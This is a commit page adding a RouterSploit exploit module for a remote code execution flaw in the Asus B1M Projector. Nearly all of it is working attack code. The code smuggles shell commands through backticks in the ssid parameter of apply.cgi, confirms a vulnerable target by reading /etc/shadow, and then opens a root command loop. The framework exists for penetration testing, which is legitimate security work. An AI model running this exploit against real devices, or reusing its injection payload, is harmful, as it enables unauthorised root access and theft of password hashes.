Asus B1M Projector RCE exploit (#260)

* Asus B1M Projector RCE exploit * Adding fixes according to PR review * Fixing comment

Asus B1M Projector RCE exploit (#260)
* Asus B1M Projector RCE exploit * Adding fixes according to PR review * Fixing comment
218fba63 · Marcin Bury · Mariusz Kupidura · 8a42b983 · 218fba63 · 218fba63
Commit 218fba63 authored 8 years ago by Marcin Bury Committed by Mariusz Kupidura 8 years ago
Hide whitespace changes
Inline Side-by-side

Showing with 63 additions and 0 deletions

__init__.py routersploit/modules/exploits/misc/asus/__init__.py +0 -0

b1m_projector_rce.py routersploit/modules/exploits/misc/asus/b1m_projector_rce.py +63 -0

No files found.
--- a/routersploit/modules/exploits/misc/asus/__init__.py
+++ b/routersploit/modules/exploits/misc/asus/__init__.py
--- a/routersploit/modules/exploits/misc/asus/b1m_projector_rce.py
+++ b/routersploit/modules/exploits/misc/asus/b1m_projector_rce.py
+from routersploit import (
+    exploits,
+    print_success,
+    print_status,
+    print_error,
+    http_request,
+    mute,
+    validators,
+    shell
+)
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for Asus B1M Projector Remote Code Execution vulnerability.
+    If the target is vulnerable, command loop is invoked that allows executing commands with root privileges.
+    """
+    __info__ = {
+        'name': 'Asus B1M Projector RCE',
+        'description': 'Module exploits Asus B1M Projector Remote Code Execution vulnerability which '
+                       'allows executing command on operating system level with root privileges.',
+        'authors': [
+            'Hacker House <www.myhackerhouse.com>',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.myhackerhouse.com/asus-b1m-projector-remote-root-0day/',
+        ],
+        'devices': [
+            'Asus B1M Projector',
+        ],
+    }
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port', validators=validators.integer)
+    def run(self):
+        if self.check():
+            print_success("Target is vulnerable")
+            print_status("Invoking command loop...")
+            shell(self, architecture="mips")
+        else:
+            print_error("Target is not vulnerable")
+    def execute(self, cmd):
+        """ callback used by shell functionality """
+        url = "{}:{}/cgi-bin/apply.cgi?ssid=\"%20\"`{}`".format(self.target, self.port, cmd)
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return ""
+        return response.text
+    @mute
+    def check(self):
+        cmd = "cat /etc/shadow"
+        response_text = self.execute(cmd)
+        if "root:" in response_text:
+            return True  # target is vulnerable
+        return False  # target is not vulnerable